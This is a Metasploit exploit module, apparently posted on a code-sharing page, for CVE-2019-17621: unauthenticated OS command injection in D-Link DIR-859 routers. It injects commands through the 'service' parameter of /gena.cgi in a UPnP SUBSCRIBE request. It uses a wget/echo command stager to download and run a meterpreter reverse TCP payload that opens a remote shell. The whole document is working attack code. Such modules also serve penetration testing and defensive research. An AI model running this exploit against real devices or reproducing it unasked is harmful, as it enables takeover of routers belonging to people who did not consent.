Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::CmdStager
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'        => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
15
      'Description' => %q{
16
        D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP
17
        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in
18
        /htdocs/cgibin), which is accessible without credentials.
19
      },
20
      'Author'      =>
21
        [
22
          'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
23
          'Pablo Pollanco P.' # Vulnerability discovery and metasploit module
24
        ],
25
      'License'     => MSF_LICENSE,
26
      'References'  =>
27
        [
28
          [ 'CVE', '2019-17621' ],
29
          [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
30
        ],
31
      'DisclosureDate' => '2019-12-24',
32
      'Privileged'     => true,
33
      'Platform'       => 'linux',
34
      'Arch'        => ARCH_MIPSBE,
35
      'DefaultOptions' =>
36
        {
37
            'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
38
            'CMDSTAGER::FLAVOR' => 'wget',
39
            'RPORT' => '49152'
40
        },
41
      'Targets'        =>
42
        [
43
          [ 'Automatic',	{ } ],
44
        ],
45
      'CmdStagerFlavor' => %w{ echo wget },
46
      'DefaultTarget'  => 0,
47
      ))
48

49
  end
50

51
  def execute_command(cmd, opts)
52
    callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s +
53
      ":" + Rex::Text.rand_text_hex(4).to_i(16).to_s +
54
      "/" + Rex::Text.rand_text_alpha(3..12)
55
    begin
56
      send_request_raw({
57
        'uri'	=> "/gena.cgi?service=`#{cmd}`",
58
        'method' =>	'SUBSCRIBE',
59
        'headers' =>
60
        {
61
                'Callback' => "<#{callback_uri}>",
62
                'NT' => 'upnp:event',
63
                'Timeout' => 'Second-1800',
64
        },
65
      })
66
    rescue ::Rex::ConnectionError
67
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
68
    end
69
  end
70

71
  def exploit
72
    execute_cmdstager(linemax: 500)
73
  end
74
end
75

76